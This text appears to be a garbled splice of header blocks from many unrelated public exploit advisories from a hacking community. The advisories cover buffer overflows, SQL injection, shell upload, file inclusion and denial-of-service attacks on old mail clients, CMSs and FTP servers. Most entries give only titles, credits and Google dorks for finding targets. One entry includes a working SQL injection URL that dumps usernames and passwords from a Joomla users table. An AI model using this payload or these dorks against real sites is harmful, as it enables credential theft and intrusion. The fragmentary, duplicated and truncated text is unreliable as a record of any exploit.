#!/usr/bin/env python
###########################################################
#
# Eureka Mail Client Remote Buffer Overflow Exploit XP SP3 English Egghunter Edition
# Coded By: k4mr4n_st@yahoo.com
# Found By: k4mr4n (Securitylab.ir Member)
# Tested On: Windows XPSP3 English
# Note: This script sets up a fake SMTP server
# Note: Set the client to this address and check your mail
#
##########################################################
Local-Exploit: yes
Vendor URL: http://www.southrivertech.com/
Found By: Bill Finlayson
http://www.accensussecurity.com
Affected: Versions 8.10.1125 and likely previous
# Name : aliboard Beta Upload Shell From ControlPanel
# Download From : http://www.alilg.com/software/free-opensource-bulletin-board/
# Found By : RoMaNcYxHaCkEr [RoMaNTiC-TeaM]
# Home Page : WwW.4RxH.CoM
# Google Dork : Powered by aliboard © 2006, 2007 alilg web-based software
#################################################################
#
# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# CNVD-ID: CNVD-2010-00752
# Found By: Qingshan Li and Lufeng Li of Neusoft Corporation
# Download: www.baofeng.com
# Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file
# Platform: Windows XPSP3 Chinese Simplified
#
#################################################################
########################################################################
# wolioCMS - SQL Injection and Bypass Administrator Login
# Vendor : http://www.buton.web.id/member.php?member=anon
# Download : http://www.buton.web.id/download/woliocms.zip
# Found By : k1tk4t - k1tk4t[4t]newhack.org
# Location : Indonesia -- #newhack[dot]org @irc.dal.net
########################################################################
Exploit ini berhasil jika 'magic_quotes_gpc = off'
########################################################################
file;
########################################################################
# Joomla Component SimpleFAQ V2.11 - Remote SQL Injection
# Vendor : http://www.parkviewconsultants.com/
# Found By : k1tk4t - k1tk4t[4t]newhack.org
# Location : Indonesia -- #newhack[dot]org @irc.dal.net
# Dork : inurl:"index.php?option=com_simplefaq"
########################################################################
joomla exploit
http://localhost/mambo/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*
########################################################################
########### newhack[dot]org ############ ########################################################################
# la-nai cms_v1.2.14 - Remote SQL Injection
# Vendor : http://www.redlinesoft.net/module.php?modname=content&cid=9
# Download : http://sourceforge.net/project/showfiles.php?group_id=191629
# Found By : k1tk4t - k1tk4t[4t]newhack.org [ http://newhack.org ]
# Location : Indonesia
########################################################################
bug terdapat pada la-nai module
tested modules
-faq
PhpBB Xs 2 profile.php Permanent Xss Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#Found By Seph1roth
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[POST METHOD]
# Name : BLOG:CMS 4.2.1.c (DIR_PLUGINS) Multiple Remote File Include
# Download From : http://dfn.dl.sourceforge.net/sourceforge/blogcms/blogcms.4.2.1.c.7z
Or Here http://blogcms.com
# Found By : RoMaNcYxHaCkEr We Are H-T TeaM (Houssamix - ToXiC)
# Home Page : Not Yet :( Tryag.cc/cc No-Hack.net V99x.com/vb Hackteach.org/cc
Google Dork : Powered by Personal Content Management System © 2003-2005 Radek Hul?n
============================================================================
# Download From : http://www.belongsoftware.co.uk/
Or Direct Link : http://www.belongsoftware.co.uk/site_builder_v0_1beta.zip
# Found By : RoMaNcYxHaCkEr We Are H-T TeaM (Houssamix - ToXiC)
# Home Page : Not Yet :( Tryag.cc/cc No-Hack.net V99x.com/vb Hackteach.org/cc
============================================================================
#!/usr/bin/env python
###################################################################################
#
# Cerberus FTP Server Denial of Service Exploit (Pre Auth)
# Found By: Francis Provencher (Protek Research Lab's)
# Tested On: Windows XPSP2
# Usage: ./script <Target IP>
#
###################################################################################
########################################################################
# AuraCMS [Forum Module] - Remote SQL Injection
# Vendor : http://auracms.org/
# Download : http://iwan.or.id/redirect/download/36.html <-- Forum Module
# Found By : k1tk4t - k1tk4t[4t]newhack.org
# Location : Indonesia -- #newhack[dot]org @irc.dal.net
# Dork : inurl:"?pilih=forum"
########################################################################
file;
/forum/komentar.php
#!/usr/bin/perl
###################################################################################
#
# Software: XLPD 3.0 Remote DoS
# Found By: Francis Provencher (Protek Research Lab's)
# Tested On: Windows XPSP2
# Usage: perl scriptname <Target IP>
#
###################################################################################
Local-Exploit: yes
Vendor URL: http://www.southrivertech.com/
Found By: Bill Finlayson
http://www.accensussecurity.com
Affected: Versions 8.10.1125 and likely previous
########################################################################
# Mambo Component SimpleFAQ V2.11 - Remote SQL Injection
# Vendor : http://www.parkviewconsultants.com/
# Found By : k1tk4t - k1tk4t[4t]newhack.org
# Location : Indonesia -- #newhack[dot]org @irc.dal.net
# Dork : inurl:"index.php?option=com_simplefaq"
########################################################################
exploit;
